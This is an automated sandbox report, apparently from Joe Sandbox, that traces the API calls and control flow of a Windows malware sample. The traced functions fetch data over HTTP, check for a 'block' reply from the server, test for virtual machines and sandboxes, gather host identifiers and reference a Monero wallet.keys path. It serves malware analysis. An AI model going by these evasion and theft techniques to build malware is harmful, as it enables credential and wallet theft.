                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                              • HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006463FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0064646D
                              • InternetCloseHandle.WININET(00000000), ref: 006464EF
                              • InternetCloseHandle.WININET(00000000), ref: 006464F9
                              • InternetCloseHandle.WININET(00000000), ref: 00646503
                              Strings
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: deedefffaaaa8f68a098c7f2ad0a21ad6d832198b681207ea8433e92465ee125
                              • Instruction ID: 223be3aae865a97de699cbdc1093f131c4e2a7686ac2b087ecc98b866f02e452
                              • Opcode Fuzzy Hash: deedefffaaaa8f68a098c7f2ad0a21ad6d832198b681207ea8433e92465ee125
                              • Instruction Fuzzy Hash: 94714F71A00218ABEF24DFE4CC45BEE77BABB45701F108159F50A6B1D0DBB46A89CF52

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 655510-655577 call 655ad0 call 65a820 * 3 call 65a740 * 4 1106 65557c-655583 1090->1106 1107 655585-6555b6 call 65a820 call 65a7a0 call 641590 call 6551f0 1106->1107 1108 6555d7-65564c call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1106->1108 1124 6555bb-6555d2 call 65a8a0 call 65a800 1107->1124 1134 655693-6556a9 call 65aad0 StrCmpCA 1108->1134 1138 65564e-65568e call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1108->1138 1124->1134 1139 6557dc-655844 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1134->1139 1140 6556af-6556b6 1134->1140 1138->1134 1269 655ac3-655ac6 1139->1269 1142 6556bc-6556c3 1140->1142 1143 6557da-65585f call 65aad0 StrCmpCA 1140->1143 1147 6556c5-655719 call 65a820 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1142->1147 1148 65571e-655793 call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1142->1148 1162 655865-65586c 1143->1162 1163 655991-6559f9 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1143->1163 1147->1143 1148->1143 1246 655795-6557d5 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1148->1246 1169 655872-655879 1162->1169 1170 65598f-655a14 call 65aad0 StrCmpCA 1162->1170 1163->1269 1177 6558d3-655948 call 65a740 * 2 call 641590 call 6552c0 call 65a8a0 call 65a800 call 65aad0 StrCmpCA 1169->1177 1178 65587b-6558ce call 65a820 call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1169->1178 1198 655a16-655a21 Sleep 1170->1198 1199 655a28-655a91 call 65a8a0 call 65a820 * 2 call 641670 call 65a800 * 4 call 656560 call 641550 1170->1199 1177->1170 1275 65594a-65598a call 65a7a0 call 641590 call 6551f0 call 65a8a0 call 65a800 1177->1275 1178->1170 1198->1106 1199->1269 1246->1143 1275->1170
                              APIs
                                • Part of subcall function 0065A820: lstrlen.KERNEL32(00644F05,?,?,00644F05,00660DDE), ref: 0065A82B
                                • Part of subcall function 0065A820: lstrcpy.KERNEL32(00660DDE,00000000), ref: 0065A885
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655644
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006556A1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655857
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655228
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 006552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655318
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 0065532F
                                • Part of subcall function 006552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00655364
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 00655383
                                • Part of subcall function 006552C0: lstrlen.KERNEL32(00000000), ref: 006553AE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0065578B
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00655940
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655A0C
                              • Sleep.KERNEL32(0000EA60), ref: 00655A1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: bb391309144d52dad249c79d91d9172c4cc37df67d6fbee72b5717beb9c0776c
                              • Instruction ID: a8b130f4e5a22889510838e562b99b03586da1156452fb7e4de20a876af780a9
                              • Opcode Fuzzy Hash: bb391309144d52dad249c79d91d9172c4cc37df67d6fbee72b5717beb9c0776c
                              • Instruction Fuzzy Hash: F3E140719101049ADB58FBF4DC66AED733ABF54301F40822DB90766191EF34AB4DCBA6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1301 6517a0-6517cd call 65aad0 StrCmpCA 1304 6517d7-6517f1 call 65aad0 1301->1304 1305 6517cf-6517d1 ExitProcess 1301->1305 1309 6517f4-6517f8 1304->1309 1310 6519c2-6519cd call 65a800 1309->1310 1311 6517fe-651811 1309->1311 1313 651817-65181a 1311->1313 1314 65199e-6519bd 1311->1314 1316 651821-651830 call 65a820 1313->1316 1317 6518ad-6518be StrCmpCA 1313->1317 1318 6518cf-6518e0 StrCmpCA 1313->1318 1319 65198f-651999 call 65a820 1313->1319 1320 651849-651858 call 65a820 1313->1320 1321 651835-651844 call 65a820 1313->1321 1322 6518f1-651902 StrCmpCA 1313->1322 1323 651951-651962 StrCmpCA 1313->1323 1324 651970-651981 StrCmpCA 1313->1324 1325 651913-651924 StrCmpCA 1313->1325 1326 651932-651943 StrCmpCA 1313->1326 1327 65185d-65186e StrCmpCA 1313->1327 1328 65187f-651890 StrCmpCA 1313->1328 1314->1309 1316->1314 1339 6518c0-6518c3 1317->1339 1340 6518ca 1317->1340 1341 6518e2-6518e5 1318->1341 1342 6518ec 1318->1342 1319->1314 1320->1314 1321->1314 1343 651904-651907 1322->1343 1344 65190e 1322->1344 1349 651964-651967 1323->1349 1350 65196e 1323->1350 1329 651983-651986 1324->1329 1330 65198d 1324->1330 1345 651926-651929 1325->1345 1346 651930 1325->1346 1347 651945-651948 1326->1347 1348 65194f 1326->1348 1335 651870-651873 1327->1335 1336 65187a 1327->1336 1337 651892-65189c 1328->1337 1338 65189e-6518a1 1328->1338 1329->1330 1330->1314 1335->1336 1336->1314 1355 6518a8 1337->1355 1338->1355 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1345->1346 1346->1314 1347->1348 1348->1314 1349->1350 1350->1314 1355->1314
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 006517C5
                              • ExitProcess.KERNEL32 ref: 006517D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: fb0910648c83645c50d2b80d5c276197fe004c43f7dad280c6aeb377545eff0a
                              • Instruction ID: 4e09b309dfd997105c824c217b75fd5c2f9a0d222094bfeb231ef9cb363f045a
                              • Opcode Fuzzy Hash: fb0910648c83645c50d2b80d5c276197fe004c43f7dad280c6aeb377545eff0a
                              • Instruction Fuzzy Hash: F6515CB4A00209EFDB04DFA4D964BBE77B6BF45705F10815DE906AB380D770E94ACB62

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1356 657500-65754a GetWindowsDirectoryA 1357 657553-6575c7 GetVolumeInformationA call 658d00 * 3 1356->1357 1358 65754c 1356->1358 1365 6575d8-6575df 1357->1365 1358->1357 1366 6575e1-6575fa call 658d00 1365->1366 1367 6575fc-657617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 657619-657626 call 65a740 1367->1369 1370 657628-657658 wsprintfA call 65a740 1367->1370 1377 65767e-65768e 1369->1377 1370->1377
                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00657542
                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0065757F
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657603
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0065760A
                              • wsprintfA.USER32 ref: 00657640
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                              • String ID: :$C$\$f
                              • API String ID: 1544550907-921915378
                              • Opcode ID: 1f272d2977b319466bb96adf4f6c737982952c7375790e38efcab85b629ad562
                              • Instruction ID: e34365225181266e63ecdaff1072e3b47ab8e9e864e9be2cf893363667528b83
                              • Opcode Fuzzy Hash: 1f272d2977b319466bb96adf4f6c737982952c7375790e38efcab85b629ad562
                              • Instruction Fuzzy Hash: BA4183B1D04248EBDB14DF98DC45BDEBBB9FF18701F100199F90967280EB75AA48CBA5

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1630), ref: 006598A1
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1540), ref: 006598BA
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1558), ref: 006598D2
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D15B8), ref: 006598EA
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16A8), ref: 00659903
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D8B38), ref: 0065991B
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C52B0), ref: 00659933
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C5310), ref: 0065994C
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D15D0), ref: 00659964
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16D8), ref: 0065997C
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D16C0), ref: 00659995
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1600), ref: 006599AD
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013C5170), ref: 006599C5
                                • Part of subcall function 00659860: GetProcAddress.KERNEL32(76210000,013D1570), ref: 006599DE
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 006411D0: ExitProcess.KERNEL32 ref: 00641211
                                • Part of subcall function 00641160: GetSystemInfo.KERNEL32(?), ref: 0064116A
                                • Part of subcall function 00641160: ExitProcess.KERNEL32 ref: 0064117E
                                • Part of subcall function 00641110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0064112B
                                • Part of subcall function 00641110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00641132
                                • Part of subcall function 00641110: ExitProcess.KERNEL32 ref: 00641143
                                • Part of subcall function 00641220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0064123E
                                • Part of subcall function 00641220: __aulldiv.LIBCMT ref: 00641258
                                • Part of subcall function 00641220: __aulldiv.LIBCMT ref: 00641266
                                • Part of subcall function 00641220: ExitProcess.KERNEL32 ref: 00641294
                                • Part of subcall function 00656770: GetUserDefaultLangID.KERNEL32 ref: 00656774
                                • Part of subcall function 00641190: ExitProcess.KERNEL32 ref: 006411C6
                                • Part of subcall function 00657850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006411B7), ref: 00657880
                                • Part of subcall function 00657850: RtlAllocateHeap.NTDLL(00000000), ref: 00657887
                                • Part of subcall function 00657850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0065789F
                                • Part of subcall function 006578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00657910
                                • Part of subcall function 006578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00657917
                                • Part of subcall function 006578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0065792F
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00656AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00656AF9
                              • Sleep.KERNEL32(00001770), ref: 00656B04
                              • CloseHandle.KERNEL32(?,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656B1A
                              • ExitProcess.KERNEL32 ref: 00656B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2525456742-0
                              • Opcode ID: 136f8ee2564c301019892b75a22a935df0cd6a3102b7bea55e6dfb2cf67fe1c8
                              • Instruction ID: 8c02888f44726c738184cf9128584ea240c74c0f3c9a430efa172446e5715054
                              • Opcode Fuzzy Hash: 136f8ee2564c301019892b75a22a935df0cd6a3102b7bea55e6dfb2cf67fe1c8
                              • Instruction Fuzzy Hash: 67313070910108AAEB44F7F0DC56BEE777ABF14302F50461DF902A61D1EF706949C7AA

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1436 641220-641247 call 6589b0 GlobalMemoryStatusEx 1439 641273-64127a 1436->1439 1440 641249-641271 call 65da00 * 2 1436->1440 1442 641281-641285 1439->1442 1440->1442 1444 641287 1442->1444 1445 64129a-64129d 1442->1445 1447 641292-641294 ExitProcess 1444->1447 1448 641289-641290 1444->1448 1448->1445 1448->1447
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0064123E
                              • __aulldiv.LIBCMT ref: 00641258
                              • __aulldiv.LIBCMT ref: 00641266
                              • ExitProcess.KERNEL32 ref: 00641294
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 3404098578-2766056989
                              • Opcode ID: be3a615fe10ae612c260d88a3292f18bb8a3b3e255a17c46cc65a250c9100c08
                              • Instruction ID: b551c6fe610ef60dc42cd9aea8687bddb332cd875a47a17df5586ed1d5fb8207
                              • Opcode Fuzzy Hash: be3a615fe10ae612c260d88a3292f18bb8a3b3e255a17c46cc65a250c9100c08
                              • Instruction Fuzzy Hash: 4701FBB0A44308FAEB10EBE4CC49B9EBB79AB15706F208159E705FA2C0D7B456C58799

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1450 656af3 1451 656b0a 1450->1451 1453 656b0c-656b22 call 656920 call 655b10 CloseHandle ExitProcess 1451->1453 1454 656aba-656ad7 call 65aad0 OpenEventA 1451->1454 1460 656af5-656b04 CloseHandle Sleep 1454->1460 1461 656ad9-656af1 call 65aad0 CreateEventA 1454->1461 1460->1451 1461->1453
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656ACA
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00656AE8
                              • CloseHandle.KERNEL32(00000000), ref: 00656AF9
                              • Sleep.KERNEL32(00001770), ref: 00656B04
                              • CloseHandle.KERNEL32(?,00000000,?,013D8C28,?,0066110C,?,00000000,?,00661110,?,00000000,00660AEF), ref: 00656B1A
                              • ExitProcess.KERNEL32 ref: 00656B22
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: d8589b5496296d52efdfafd303c2763644006d135f73a0b8b1837b21cf6f8789
                              • Instruction ID: 02fa8e5fecf444772ae882ff156bf54eed13eb4f310fb8cd8ec5f78d65e6c9c2
                              • Opcode Fuzzy Hash: d8589b5496296d52efdfafd303c2763644006d135f73a0b8b1837b21cf6f8789
                              • Instruction Fuzzy Hash: 42F05E70940209ABF740ABA0DD1ABBD7B75FF04702F904519BD13A21D1DBB05549D76A

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: a7b073f9ac58d3854a5e7f55ba653d1608b69c936465b2a4c79ea462ef115f4a
                              • Instruction ID: 683bcecc9263d6f94b8050bcc202907ba6c356ebc4d8f3a02d2a6a462c4ec124
                              • Opcode Fuzzy Hash: a7b073f9ac58d3854a5e7f55ba653d1608b69c936465b2a4c79ea462ef115f4a
                              • Instruction Fuzzy Hash: A7214FB1D00209ABDF14DFA4E845ADE7B75FB45320F108629F955A72C0EB706A09CF81

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 00646280: InternetOpenA.WININET(00660DFE,00000001,00000000,00000000,00000000), ref: 006462E1
                                • Part of subcall function 00646280: StrCmpCA.SHLWAPI(?,013DEC50), ref: 00646303
                                • Part of subcall function 00646280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00646335
                                • Part of subcall function 00646280: HttpOpenRequestA.WININET(00000000,GET,?,013DE238,00000000,00000000,00400100,00000000), ref: 00646385
                                • Part of subcall function 00646280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006463BF
                                • Part of subcall function 00646280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006463D1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00655228
                              Strings
